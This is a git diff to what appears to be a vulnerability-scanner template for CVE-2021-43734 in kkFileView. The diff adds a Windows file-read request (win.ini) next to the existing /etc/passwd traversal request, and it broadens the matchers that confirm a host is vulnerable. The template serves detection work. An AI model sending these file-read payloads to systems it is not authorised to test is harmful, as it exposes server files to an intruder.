diff --git a/cves/2021/CVE-2021-43734.yaml b/cves/2021/CVE-2021-43734.yaml
index e8347c9cb5..171404f3ef 100644
--- a/cves/2021/CVE-2021-43734.yaml
+++ b/cves/2021/CVE-2021-43734.yaml
@@ -17,18 +17,22 @@ info:
   metadata:
     shodan-query: http.html:"kkFileView"
     verified: "true"
-  tags: cve,cve2021,kkfileview,traversal
+  tags: cve,cve2021,kkfileview,traversal,lfi
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
+      - "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: regex
         regex:
-          - "root:[x*]:0:0"
+          - "root:.*:0:0:"
+          - "for 16-bit app support"
+        condition: or
 
       - type: status
         status: